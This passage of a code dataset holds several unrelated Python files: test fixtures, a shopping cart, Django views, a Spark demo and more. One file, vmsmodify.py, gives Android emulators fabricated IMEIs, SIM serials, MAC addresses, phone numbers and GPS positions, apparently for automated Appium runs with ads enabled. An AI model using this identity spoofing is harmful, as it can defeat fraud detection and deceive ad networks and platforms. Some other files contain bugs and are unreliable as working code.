'tz': 'America\\/Los_Angeles',\n 'tz_label': 'Pacific Daylight Time',\n 'tz_offset': -25200,\n 'profile': {\n 'avatar_hash': 'ge3b51ca72de',\n 'status_text': 'Print is dead',\n 'status_emoji': ':books:',\n 'real_name': 'Egon Spengler',\n 'display_name': 'spengler',\n 'real_name_normalized': 'Egon Spengler',\n 'display_name_normalized': 'spengler',\n 'email': 'spengler@ghostbusters.example.com',\n 'image_24': 'https:\\/\\/...\\/avatar\\/e3b51ca72dee4ef87916ae2b9240df50.jpg',\n 'image_32': 'https:\\/\\/...\\/avatar\\/e3b51ca72dee4ef87916ae2b9240df50.jpg',\n 'image_48': 'https:\\/\\/...\\/avatar\\/e3b51ca72dee4ef87916ae2b9240df50.jpg',\n 'image_72': 'https:\\/\\/...\\/avatar\\/e3b51ca72dee4ef87916ae2b9240df50.jpg',\n 'image_192': 'https:\\/\\/...\\/avatar\\/e3b51ca72dee4ef87916ae2b9240df50.jpg',\n 'image_512': 'https:\\/\\/...\\/avatar\\/e3b51ca72dee4ef87916ae2b9240df50.jpg',\n 'team': 'T012AB3C4'\n },\n 'is_admin': True,\n 'is_owner': False,\n 'is_primary_owner': False,\n 'is_restricted': False,\n 'is_ultra_restricted': False,\n 'is_bot': False,\n 'updated': 1502138686,\n 'is_app_user': False,\n 'has_2fa': False\n },\n {\n 'id': 'W07QCRPA4',\n 'team_id': 'T0G9PQBBK',\n 'name': 'glinda',\n 'deleted': False,\n 'color': '9f69e7',\n 'real_name': 'Glinda Southgood',\n 'tz': 'America\\/Los_Angeles',\n 'tz_label': 'Pacific Daylight Time',\n 'tz_offset': -25200,\n 'profile': {\n 'avatar_hash': '8fbdd10b41c6',\n 'image_24': 'https:\\/\\/a.slack-edge.com...png',\n 'image_32': 'https:\\/\\/a.slack-edge.com...png',\n 'image_48': 'https:\\/\\/a.slack-edge.com...png',\n 'image_72': 'https:\\/\\/a.slack-edge.com...png',\n 'image_192': 'https:\\/\\/a.slack-edge.com...png',\n 'image_512': 'https:\\/\\/a.slack-edge.com...png',\n 'image_1024': 'https:\\/\\/a.slack-edge.com...png',\n 'image_original': 'https:\\/\\/a.slack-edge.com...png',\n 'first_name': 'Glinda',\n 'last_name': 'Southgood',\n 'title': 'Glinda the Good',\n 'phone': '',\n 'skype': '',\n 'real_name': 'Glinda Southgood',\n 'real_name_normalized': 'Glinda Southgood',\n 'display_name': 'Glinda the Fairly Good',\n 'display_name_normalized': 'Glinda the Fairly Good',\n 'email': 'glenda@south.oz.coven'\n },\n 'is_admin': True,\n 'is_owner': False,\n 'is_primary_owner': False,\n 'is_restricted': False,\n 'is_ultra_restricted': False,\n 'is_bot': False,\n 'updated': 1480527098,\n 'has_2fa': False\n }\n ],\n 'cache_ts': 1498777272,\n 'response_metadata': {\n 'next_cursor': 'dXNlcjpVMEc5V0ZYTlo='\n }\n}\n","sub_path":"example/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"567992657","text":"# -*- coding: utf-8 -*-\n\n# Python\nfrom functools import reduce\nfrom datetime import datetime\n\n# Third\nfrom mongoengine.errors import NotUniqueError, ValidationError\nfrom mongoengine.errors import MultipleObjectsReturned, DoesNotExist\n\n\n# Apps\nfrom shopping_cart.sentry import sentry\nfrom shopping_cart.messages import _MSG300\nfrom shopping_cart.responses import resp_already_exists, resp_exception\nfrom .models import Cart, Supplier, Variant, Image, Item\n\n\ndef create_cart(suppliers=None, products=None):\n '''\n Create cart with suppliers and products data if exists\n '''\n cart = Cart()\n\n if suppliers is None and products is None:\n return cart.save()\n\n supplier = create_supplier(suppliers)\n\n if supplier and products:\n try:\n product = create_product(products)\n\n except Exception as e:\n sentry.captureException()\n\n return resp_exception('Carts', description=e)\n\n subtotal, total = calculate_product_price(product)\n product.total = total\n product.subtotal = subtotal\n\n supplier.items.append(product)\n\n try:\n cart.suppliers.append(supplier)\n\n except Exception as e:\n sentry.captureException()\n\n return resp_exception('Carts', description=e)\n\n subtotal, total = calculate_total_and_subtotal(supplier.items)\n supplier.subtotal = subtotal\n supplier.total = total\n\n subtotal, total = calculate_total_and_subtotal(cart.suppliers)\n cart.subtotal = subtotal\n cart.total = total\n\n try:\n cart.updated = datetime.now()\n cart.save()\n\n except NotUniqueError:\n sentry.captureException()\n\n return resp_already_exists('Carts', 'carrinho')\n\n except ValidationError as e:\n sentry.captureException()\n\n return resp_exception('Carts', msg=_MSG300, description=e)\n\n except Exception as e:\n sentry.captureException()\n\n return resp_exception('Carts', description=e)\n\n return cart\n\n\ndef merge_carts():\n '''\n Merge de carrinho de compras caso existam compradores iguais user_id\n '''\n pass\n\n\ndef create_supplier(supplier):\n '''\n Adiciona o fornecedor\n '''\n if supplier:\n sup = Supplier(**supplier)\n else:\n sup = None\n\n return sup\n\n\ndef create_variant(data):\n '''\n Adiciona a variacao escolhida no produto\n '''\n try:\n variant = Variant(**data)\n except Exception as e:\n raise e\n\n return variant\n\n\ndef create_image(data):\n '''\n Adiciona a variacao escolhida no produto\n '''\n try:\n image = Image(**data)\n except Exception as e:\n raise e\n\n return image\n\n\ndef create_sellkey(product, variant):\n '''\n SellKey {Product Id}-{Seller Id}-{Supplier Id};{qty};{price};{subtotal};{total};{Shipping Rate};{shipping Fee}-{Variant Key}-{Variant Name} # noqa\n '''\n return '{}-{}-{}-{};{};{};{};{};{}-{}-{}'.format(\n product.product_id,\n product.seller_id,\n product.supplier_id,\n product.qty,\n product.price,\n product.subtotal,\n product.total,\n product.ship_flat_rate,\n product.shipping_fee,\n variant.key,\n variant.name\n )\n\n\ndef create_product(item):\n '''\n Adiciona produto no carrinho\n '''\n\n # TODO: Tratar variacao\n\n if 'variant' in item:\n try:\n variant = create_variant(item.get('variant', None))\n except Exception as e:\n raise e\n\n # TODO: Tratar Image\n\n if 'image' in item:\n try:\n image = create_image(item.get('image', None))\n except Exception as e:\n raise e\n\n # TODO: Criar Produto\n\n del item['image']\n del item['variant']\n\n try:\n product = Item(variant=variant, image=image, **item)\n product.key = create_sellkey(product, variant)\n except Exception as e:\n raise e\n\n return product\n\n\ndef get_supplier_by_id(suppliers, id):\n '''\n Return a supplier by id\n '''\n\n try:\n return suppliers.get(supplier_id=id)\n\n except NotUniqueError:\n sentry.captureException()\n\n return resp_already_exists('Carts', 'carrinho')\n\n except DoesNotExist:\n return None\n\n except ValidationError as e:\n sentry.captureException()\n\n return resp_exception('Carts', msg=_MSG300, description=e)\n\n except MultipleObjectsReturned as e:\n sentry.captureException()\n\n return resp_exception('Carts', msg=_MSG300, description=e)\n\n except Exception as e:\n sentry.captureException()\n\n return resp_exception('Carts', description=e)\n\n\ndef get_product_by_id(items, id):\n '''\n Return a supplier by id\n '''\n\n try:\n return items.get(product_id=id)\n\n except NotUniqueError:\n sentry.captureException()\n\n return resp_already_exists('Carts', 'carrinho')\n\n except DoesNotExist:\n return None\n\n except ValidationError as e:\n sentry.captureException()\n\n return resp_exception('Carts', msg=_MSG300, description=e)\n\n except MultipleObjectsReturned as e:\n sentry.captureException()\n\n return resp_exception('Carts', msg=_MSG300, description=e)\n\n except Exception as e:\n sentry.captureException()\n\n return resp_exception('Carts', description=e)\n\n\ndef calculate_product_price(product):\n '''\n Calculo do preços de cada item\n '''\n if product.qty <= 0:\n raise ValueError('A quantidade não pode ser menor que zero.')\n\n subtotal = product.qty * product.price\n total = subtotal - product.discount_price\n\n if product.ship_flat_rate:\n total -= product.shipping_fee\n\n return subtotal, total\n\n\ndef calculate_total_and_subtotal(model):\n '''\n TODO: refact with calculate_supplier_total_and_subtotal\n Calculate Total\n '''\n subtotal, total = 0, 0\n\n if len(model) > 1:\n subtotal = reduce(\n lambda x, y: x.subtotal + y.subtotal, model\n )\n elif len(model) == 1:\n subtotal = model[0].subtotal\n else:\n subtotal = 0\n\n if len(model) > 1:\n total = reduce(\n lambda x, y: x.total + y.total, model\n )\n elif len(model) == 1:\n total = model[0].total\n else:\n total = 0\n\n return subtotal, total\n","sub_path":"shopping_cart/cart/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"396592006","text":"class Solution:\n def minCut(self, s: str) -> int:\n self.s = s\n # return self.recursive(0, len(s))\n return self.iteration()\n\n def recursive(self, f, e):\n if self.is_palindrome(self.s[f:e]):\n return 0\n min_cut = float('inf')\n for i in range(1, e-f):\n cut = 1 + self.recursive(f+i, e) + self.recursive(f, f+i)\n if min_cut > cut:\n min_cut = cut\n return min_cut\n\n def iteration(self):\n n = len(self.s)\n check_palindrome = [[False for _ in range(n)] for _ in range(n)]\n for right in range(n):\n for left in range(right + 1):\n if s[left] == s[right] and (right - left <= 2 or check_palindrome[left + 1][right - 1]):\n check_palindrome[left][right] = True\n res = [[0 for _ in range(n+1)] for _ in range(n+1)]\n for i in range(n-1):\n k, l = 0, 2+i\n while k <= n and l <= n:\n # if self.is_palindrome(self.s[k:l]):\n if check_palindrome[k][l-1]:\n res[k][l] = 0\n else:\n t = [res[k+i][l] + res[k][k+i] for i in range(1, l-k)]\n res[k][l] = 1 + min(t)\n k += 1\n l += 1\n return res[0][-1]\n\n def is_palindrome(self, s):\n f, e = 0, len(s)-1\n while f < e:\n if s[f] != s[e]:\n return False\n f += 1\n e -= 1\n return True\n\n\nif __name__ == '__main__':\n s = 'aab'\n solu = Solution()\n print(solu.minCut(s))\n","sub_path":"min_cut_palindrome.py","file_name":"min_cut_palindrome.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"604928538","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n用来修改VMS文件的内容的,vms文件内容是xml格式,需要修改内部值来\n\"\"\"\nimport os\nimport subprocess\nimport uuid\nimport xml.dom.minidom\n\nfrom .utils import Utils\n\n\nclass VMSModifyHandler(object):\n\n def __init__(self, logger):\n self.logger = logger\n self.config_dir = os.path.dirname(os.path.abspath(__file__))\n self.config_xml_file = os.path.join(self.config_dir, 'vms.config.xml')\n self.print('The VMS Config XML Path: {}'.format(self.config_xml_file))\n self.configs = [] # config xml element\n\n for maybe_path in [\n 'C:\\Program Files\\Microvirt\\MEmu\\memuc.exe',\n 'D:\\VMSMicrovirt\\MEmu\\memuc.exe'\n ]:\n if os.path.exists(maybe_path):\n self.vmcmd = maybe_path\n break\n\n def print(self, msg, is_exception=False):\n if self.logger:\n if is_exception:\n self.logger.exception('Error:')\n else:\n self.logger.info(msg)\n else:\n print(msg)\n\n @staticmethod\n def get_local_mac_address():\n mac = uuid.UUID(int=uuid.getnode()).hex[-12:]\n return \":\".join([mac[e:e + 2] for e in range(0, 11, 2)])\n\n def get_vms_configs(self):\n return self.configs\n\n async def reload_vms_config_info(self):\n \"\"\"\n 更新、重载VMS的配置信息\n :return:\n \"\"\"\n\n self.configs = []\n dom = xml.dom.minidom.parse(self.config_xml_file)\n root = dom.documentElement\n\n machines = root.getElementsByTagName('machine')\n for one_machine in machines:\n if one_machine.hasAttribute('name'):\n machine_name = one_machine.getAttribute('name')\n machine_mac_address = one_machine.getAttribute('macAddress')\n self.print(\n \"Reading the '{0} - {1}' machine config information.\".format(machine_name, machine_mac_address))\n\n configs = one_machine.getElementsByTagName('config')\n self.print(\"The config information count = %d\" % len(configs))\n\n # 根据每一个config来处理内容\n for one_config in configs:\n if one_config.hasAttribute('enable') and \\\n one_config.hasAttribute('vmname'):\n config_enable = one_config.getAttribute('enable')\n config_vmname = one_config.getAttribute('vmname')\n config_vmid = one_config.getAttribute('vmid')\n config_enable_ads = one_config.getAttribute('enable_ads')\n config_start_cmd = one_config.getAttribute('startCommand')\n config_appium_cmd = one_config.getAttribute('appiumCommand')\n\n extend_vm_info = {\n 'win_x': one_config.getAttribute('win_x'),\n 'win_y': one_config.getAttribute('win_y'),\n 'win_scaling_percent2': one_config.getAttribute('win_scaling_percent2'),\n 'resolution_width': one_config.getAttribute('resolution_width'),\n 'resolution_height': one_config.getAttribute('resolution_height'),\n }\n\n self.configs.append({\n 'macAddress': machine_mac_address,\n 'vmid': config_vmid,\n 'vmname': config_vmname,\n 'enable': config_enable,\n 'enable_ads': config_enable_ads,\n 'startCommand': config_start_cmd,\n 'appiumCommand': config_appium_cmd,\n 'extend_vm_info': extend_vm_info\n })\n\n if not config_enable or config_enable != 'true':\n continue\n\n def modify_all_vms(self):\n if len(self.configs) == 0:\n self.print(\"The vms config file is invalid, please run reload_vms_config_info() function first.\")\n return\n\n for one_config in self.configs:\n config_enable = one_config['enable']\n config_vmname = one_config['vmname']\n config_vmid = one_config['vmid']\n config_path = one_config['path']\n\n if not config_enable or config_enable != 'true':\n continue\n\n # 判断配置是否是文件,并且具有可读写操作\n if os.path.isfile(config_path):\n self.print(\"vmid=%s, vmname=%s, vmsfile=%s\" % (config_vmid, config_vmname, config_path))\n VMSModifyHandler.rebuild(config_path)\n\n def set_vm_config(self, vmid, extend_info):\n self.print('start setting vm new config...')\n new_gps_pos = Utils.generate_new_pos()\n config_info = {\n 'macaddress': \":\".join(Utils.generate_new_mac_address_list()).upper(),\n 'linenum': str(Utils.generate_new_phone_number()),\n 'latitude': str(new_gps_pos['latitude']),\n 'longitude': str(new_gps_pos['longitude']),\n 'simserial': str(Utils.generate_new_simserial()),\n 'imei': str(Utils.generate_new_imei()),\n\n # 'bssid': Utils.generate_new_bssid().upper(),\n # 'cellid': Utils.generate_new_cellid(),\n # 'ssid': Utils.generate_new_wifi_id(),\n }\n\n # 兼容扩展属性\n for key in extend_info.keys():\n value = extend_info[key]\n config_info[key] = value\n\n for key in config_info.keys():\n value = config_info[key]\n obj = subprocess.Popen([self.vmcmd, 'setconfig', '-i', vmid, key, value], stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n cmd_out = obj.stdout.read()\n obj.stdout.close()\n self.print(cmd_out)\n\n self.print('setting vm new config over ...')\n\n async def adb_devices(self):\n obj = subprocess.Popen(['adb', 'devices'], stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, universal_newlines=True)\n cmd_out = obj.stdout.read()\n obj.stdout.close()\n self.print('CMD: adb devices')\n self.print(cmd_out)\n\n async def start_vm(self, vmid):\n obj = subprocess.Popen([self.vmcmd, 'start', '-i', vmid], stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, universal_newlines=True)\n cmd_out = obj.stdout.read()\n obj.stdout.close()\n\n if cmd_out.strip() == 'SUCCESS: start vm finished.':\n return True\n\n return False\n\n async def stop_vm(self, vmid):\n obj = subprocess.Popen([self.vmcmd, 'stop', '-i', vmid], stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, universal_newlines=True)\n cmd_out = obj.stdout.read()\n obj.stdout.close()\n\n if cmd_out.strip() == 'SUCCESS: stop vm finished.':\n return True\n\n return False\n\n async def vm_is_running(self, vmid):\n obj = subprocess.Popen([self.vmcmd, 'isvmrunning', '-i', vmid], stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, universal_newlines=True)\n cmd_out = obj.stdout.read()\n obj.stdout.close()\n\n if cmd_out.strip() == 'Running':\n return True\n\n return False\n","sub_path":"Python-Books/code-projects/auto-appium-android/libs/vmsmodify.py","file_name":"vmsmodify.py","file_ext":"py","file_size_in_byte":7482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"249283188","text":"from django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.models import User, Group\nfrom django.shortcuts import render, redirect, render_to_response\nfrom testing.forms import RegistrationForm, EditProfileForm, Form3_form\nfrom testing.models import Document, Form1, Form3\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.template.loader import get_template \nfrom django.template import Context\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView\nfrom django.utils.encoding import smart_str\nimport os\nfrom django.conf import settings\nfrom django.views.static import serve\n\nfrom testing.forms import Form1_form\n\n\n\ndef HomePageView(request):\n template = get_template('index.html')\n variables = Context({ 'user': request.user })\n output = template.render(variables)\n return HttpResponse(output)\n\n\ndef register_page(request):\n if request.method == 'POST':\n form = RegistrationForm(request.POST, request.FILES)\n if form.is_valid():\n user = User.objects.create_user(username=form.cleaned_data['username'],password=form.cleaned_data['password1'],email=form.cleaned_data['email'])\n user.first_name=form.cleaned_data['first_name']\n user.last_name=form.cleaned_data['last_name']\n user.save()\n if form.cleaned_data['itemsField'] == '1':\n \n g = Group.objects.get(name='WGWP')\n g.user_set.add(user)\n else:\n \n g = Group.objects.get(name='GO')\n g.user_set.add(user)\n \n newdoc = Document(docfile = request.FILES['docfile'])\n newdoc.save()\n return HttpResponseRedirect('/')\n else:\n form = RegistrationForm()\n\n variables = RequestContext(request, {'form': form})\n return render_to_response('registration/register.html',variables)\n\n\ndef logout_page(request):\n logout(request)\n return HttpResponseRedirect('/')\n\ndef faq(request):\n return HttpResponseRedirect('/')\n\n\ndef profile_view(request):\n user = request.user\n form = EditProfileForm(initial={'first_name':user.first_name, 'last_name':user.last_name})\n context = {\n \"form\":form\n } \n return render(request, 'registration/profile.html', context)\n\ndef edit_profile(request):\n user = request.user\n form = EditProfileForm(request.POST or None, initial={'first_name':user.first_name, 'last_name':user.last_name})\n if request.method == 'POST':\n if form.is_valid():\n user.first_name = request.POST['first_name']\n user.last_name = request.POST['last_name']\n user.save()\n return HttpResponseRedirect('/profile')\n\n context={\n \"form\":form\n }\n return render(request,'registration/edit_profile.html', context)\n\n\ndef download_page(request):\n \n filepath=settings.MEDIA_ROOT+'/SWM_2016.pdf'\n return serve(request, os.path.basename(filepath), os.path.dirname(filepath))\n\n\ndef frm1(request):\n form = Form1_form\n user = request.user\n if request.method==\"POST\":\n form = Form1_form(request.POST)\n feed_cont = form.save(commit=False)\n feed_cont.user=request.user\n feed_cont.save()\n if form.is_valid():\n form.save()\n return HttpResponseRedirect('/')\n else:\n form=Form1_form()\n return render_to_response('registration/form1.html',{'form': form} , context_instance=RequestContext(request))\n\n\ndef frm3(request):\n form = Form3_form\n user = request.user\n if request.method==\"POST\":\n form = Form3_form(request.POST)\n if form.is_valid():\n feed_cont = form.save(commit=False)\n feed_cont.user=request.user\n feed_cont.save()\n newdoc = Form3(ww_waste = request.FILES['ww_waste'])\n newdoc.save()\n \n form.save()\n return HttpResponseRedirect('/')\n else:\n form=Form3_form()\n return render_to_response('registration/form3.html',{'form': form} , context_instance=RequestContext(request))\n\n\n\n","sub_path":"testing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"310024856","text":"# coding:utf8\n\nfrom pyspark.sql import SparkSession\n\n\nif __name__ == '__main__':\n # 0. 构建执行环境入口对象SparkSession\n spark = SparkSession.builder.\\\n appName(\"test\").\\\n master(\"local[*]\").\\\n getOrCreate()\n sc = spark.sparkContext\n\n # 基于RDD转换成DataFrame\n rdd = sc.textFile(\"../data/input/sql/people.txt\").\\\n map(lambda x: x.split(\",\")).\\\n map(lambda x: (x[0], int(x[1])))\n\n # 构建DataFrame对象\n # 参数1 被转换的RDD\n # 参数2 指定列名, 通过list的形式指定, 按照顺序依次提供字符串名称即可\n df = spark.createDataFrame(rdd, schema=['name', 'age'])\n\n # 打印DataFrame的表结构\n df.printSchema()\n\n # 打印df中的数据\n # 参数1 表示 展示出多少条数据, 默认不传的话是20\n # 参数2 表示是否对列进行截断, 如果列的数据长度超过20个字符串长度, 后续的内容不显示以...代替\n # 如果给False 表示不阶段全部显示, 默认是True\n df.show(20, False)\n\n # 将DF对象转换成临时视图表, 可供sql语句查询\n df.createOrReplaceTempView(\"people\")\n spark.sql(\"SELECT * FROM people WHERE age < 30\").show()\n","sub_path":"spark-learn/SQL-demos/create-demo.py","file_name":"create-demo.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"268249605","text":"#dictionary\nfrom dict import stu_detail\n'''keys_name = ['name','marks','subjects']\nkeys_val = ['ram',22,'eng']\nmy_list = zip(keys_name,keys_val)\nprint(my_list)\nmy_dict = dict(my_list)\nprint(my_dict)'''\n\nmy_dict = {'name': 'ram', 'marks': 25, 'subjects': 'eng'}\nmy_class = {'student1': {'name': 'shyam', 'marks':23,'subjects': 'math'},\n'student2': {'name': 'sham', 'marks': 23,'subjects': 'math'},\n'student3': {'name': 'shya', 'marks': 23,'subjects': 'math'},\n'student4': {'name': 'shyama', 'marks': 23,'subjects': 'math'},\n'student5': {'name': 'shyamal', 'marks': 23, 'subjects': 'math'}}\n\nprint(my_class['student1']['name'])\nprint(my_class['student1']['name'])\nask = input(\"Are you a student or teacher \")\n\nif ask == 'teacher':\n\n k = len(my_class) + 1\n con = input('Do you want to add.enter y or n')\n while con == 'y':\n n = input('enter name')\n m = input('enter marks')\n s = input('enter sub')\n my_class['student' + str(k)] = {'name': n, 'marks': m, 'subjects': s}\n k = k+1\n con = input('Do you want to add.enter y or n ')\n print(my_class)\n for i in my_class:\n name = my_class[i]['name']\n marks = my_class[i]['marks']\n subjects = my_class[i]['subjects']\n stu_detail(name, marks, subjects)\nelif ask == 'student':\n stuname = input('enter your name ')\n stu_list=[]\n for i in my_class:\n stu_list.append(my_class[i]['name'])\n if stuname == my_class[i]['name']:\n stu_marks = my_class[i]['marks']\n stu_sub = my_class[i]['subjects']\n print(f' {stuname} your marks are {stu_marks} and You have {stu_sub}')\n break\nelse:\n print('not valid entry')\n\n\n\n\n\n","sub_path":"dict_2.py","file_name":"dict_2.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"148022736","text":"from django.core.management.base import BaseCommand, CommandError\nfrom sumo.models import SumoStage, SumoStageMatch, SumoGroupMatch, SumoGroup, SumoGroupTeam\nfrom random import shuffle\n\n\nclass Command(BaseCommand):\n args = \"hede\"\n help = 'Generates micro sumo groups.'\n\n def handle(self, *args, **options):\n group_robots = list()\n last_stage = SumoStage.objects.all()[-1]\n for match in SumoStageMatch.objects.filter(stage=last_stage):\n if match.home > match.away:\n group_robots.append(match.home.robot)\n else:\n group_robots.append(match.away.robot)\n current_bye = last_stage.bye_robot\n group_robots.append(current_bye)\n\n for robot in group_robots:\n SumoGroupTeam.objects.create(group=final_group, robot=robot)\n\n count = len(group_robots)\n order = 1\n for i in range(0, count-1):\n hold = group_robots[count-1]\n lst = group_robots[0:count-1]\n lst_shift = group_robots[0:count-1]\n for j in range(0,len(lst)/2):\n home = lst.pop()\n away = lst.pop(0)\n SumoGroupMatch.objects.create(home=home,\n away=away,\n group=final_group,\n order=order)\n order += 1\n SumoGroupMatch.objects.create(home=hold,\n away=lst.pop(),\n group=final_group,\n order=order)\n order += 1\n lst_shift.insert(0,lst_shift.pop())\n lst_shift.append(hold)\n group_robots = lst_shift\n","sub_path":"ituro/sumo/management/commands/generatefinalgroup.py","file_name":"generatefinalgroup.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"42913248","text":"#! /usr/bin/env python\n# coding=utf-8\n\n\"\"\"\n\n读取 CWN 中的数据。\n\n词汇的形式属于繁体中文。由于词典是编纂而来,因此具有准确度和较低的召回度。\n\n修改原始的类与函数:\n\n1. 仿照WordNet,将词素、词义和义项拆分成三个类。\n2. 保留查询关系的函数;补充获取义项(Synset)列表的函数,因一个词素可对应多个义项。\n3. 籠統的講,詞彙(或詞素)和義項(或概念)之間是n:n的關係,這一點在CWN、WN、BN中都有所體現。\n 在指示對象的時候,概念和詞彙是一枚硬幣的兩面,它們具有等同的地位。\n \n 這種“地位等同”表現在“與其它表示相聯繫”的過程中。\n “其它表示”指的是:樣例、含義、主題或語義標籤等。在真正的符號理解之前,這兩種表示是等同的。\n\n 此處的“符號理解”是指:對於詞彙和概念的掌握和應用得以表現出來——以一種嚴格、普遍的規範表現出來。例示“等同”:\n - 假如我觀察到了一棵樹,我可以通過大腦的激活、或是詞典的查詢來收容這顆樹,進而作出下一步動作;\n - 假如我觀察到“樹”這個字,我可以查詢詞典,或者尋找樣例、或想象力再現以收容這個字,進而作出下一步動作。\n - 在我無法驗證我的動作的收益之時,我進行動作的四條途徑都是可行的,並且沒有差別。\n 在獲得驗��“途徑”的收益的規範之後,它們才因收益的不同而獲得不同的地位。\n\n#. 原始数据中,cwn_id并无外键,数据库的关系需要从代码中推测,因此,如函数lookup_relation的结果仍需要验证。\n\n\"\"\"\n\nimport io\nimport sys\nimport pandas as pd\nfrom sqlite3 import connect\n\npd.set_option('display.width', 720)\n\nconn = connect(database='/home/shawn/Projects/x.resources/semantic/CWN/cwn_dirty.sqlite')\nc = conn.cursor()\n\n\nclass Lemmas:\n def __init__(self, lemma_type):\n self.lemma_type = lemma_type\n self.lemmas = self.lookup_lemmas()\n self.lemma_ids = self.lemmas['lemma_id']\n\n def lookup_lemmas(self):\n c.execute(u'select * from cwn_lemma where lemma_type=\"{}\"'.format(self.lemma_type))\n _columns = [i[0] for i in c.description]\n return pd.DataFrame(c.fetchall(), columns=_columns)\n\n def lookup_relations(self, lemma_id):\n res = {}\n c.execute(u'select * from cwn_relation where cwn_id like \"%{}%\"'.format(lemma_id))\n for cwn_relation in c.fetchall():\n rel_type = cwn_relation[3]\n rel_lemma = cwn_relation[4]\n if rel_type not in res:\n res[rel_type] = [rel_lemma]\n else:\n res[rel_type].append(rel_lemma)\n return res\n\n\n# noinspection PyMethodMayBeStatic\nclass Senses:\n def __init__(self, lemma_id):\n self.lemma_id = lemma_id\n self.senses = self.lookup_senses()\n self.sense_ids = self.senses['sense_id']\n self.synset_ids = self.senses['synset_id']\n\n def lookup_senses(self):\n _senses = []\n c.execute(u'select * from cwn_sense where lemma_id=\"{}\"'.format(self.lemma_id))\n _columns = [i[0] for i in c.description]\n return pd.DataFrame(c.fetchall(), columns=_columns)\n\n def lookup_examples(self, sense_id):\n # return example contents of a sense_id.\n c.execute(u'select * from cwn_example where cwn_id=\"{}\"'.format(sense_id))\n _columns = [i[0] for i in c.description]\n return pd.DataFrame(c.fetchall(), columns=_columns)\n\n\nclass Synset:\n def __init__(self, synset_id):\n self.synset_id = synset_id\n self.synset = self.lookup_synset()\n\n def lookup_synset(self):\n # column member should be id in table of cwn_sense.\n c.execute(u'select * from cwn_goodSynset where id = {}'.format(self.synset_id))\n _columns = [i[0] for i in c.description]\n return pd.Series(c.fetchone(), index=_columns)\n\n\nif __name__ == '__main__':\n\n # format of pandas.to_html().\n table_css = u'''\n '''\n\n token = unicode(sys.argv[1], 'utf8')\n html_fld = sys.argv[2] if len(sys.argv) > 3 else '/home/shawn/Documents/temp/cwordnet/'\n with io.open(u'{}Lemma_net_{}.html'.format(html_fld, token), 'w', encoding='utf8') as f:\n f.write(table_css)\n html = io.open(u'{}Lemma_net_{}.html'.format(html_fld, token), 'a', encoding='utf8')\n\n a_lemmas = Lemmas(lemma_type=token)\n html.write(u'

Lemma ids are:

')\n a_lemmas.lemmas.to_html(html)\n\n for lemma_id in a_lemmas.lemma_ids:\n html.write(u'

Lemma {} has following relations:

'.format(lemma_id))\n a_relations = a_lemmas.lookup_relations(lemma_id)\n pd.DataFrame.from_records(a_relations.iteritems()).to_html(html)\n\n html.write(u'

Lemma {} has following senses:

'.format(lemma_id))\n a_senses = Senses(lemma_id=lemma_id)\n a_senses.senses.get(['sense_id', 'synset_id']).to_html(html)\n\n for sense_id, synset_id in zip(a_senses.sense_ids, a_senses.synset_ids):\n example = a_senses.lookup_examples(sense_id)\n html.write(u'

Sense {} has following examples:

'.format(sense_id))\n example.to_html(html)\n\n a_synset = Synset(synset_id=synset_id)\n html.write(u'

Synset {} includes attributes of:

'.format(synset_id))\n a_synset.synset.get(['gloss', 'member']).to_frame().to_html(html)\n\n html.close()\n","sub_path":"mimicry/lexicon/cwordnet.py","file_name":"cwordnet.py","file_ext":"py","file_size_in_byte":6453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"243332696","text":"# -*- coding: utf-8 -*-\n# © 2017 Jérôme Guerriat\n# © 2017 Niboo SPRL (https://www.niboo.be/)\n# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl.html).\n\nfrom odoo import api, fields, models\nimport urllib2\nimport json\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass PrintedStickers(models.Model):\n\n _name = 'printed.sticker'\n\n date_printed = fields.Datetime(String='Printed On')\n template_name = fields.Text(string='URL called')\n json_params = fields.Text(string='Parameters')\n mrp_production_id = fields.Many2one('mrp.production',\n string='Origin Production')\n stock_picking_id = fields.Many2one('stock.picking',\n string='Origin Picking')\n\n @api.multi\n def reprint_sticker(self):\n irconfig = self.env['ir.config_parameter']\n host = irconfig.get_param('bartender_host', default='')\n port = irconfig.get_param('bartender_port', default='')\n\n for sticker in self:\n url = 'http://%s:%s/Integration/%s/Execute' \\\n % (host, port, sticker.template_name)\n req = urllib2.Request(url)\n req.add_header('Content-Type', 'application/json')\n params = json.dumps(sticker.json_params)\n _logger.info(\"Printed with url %s and parameterss %s\" % (url,\n params))\n\n response = urllib2.urlopen(req, params)\n 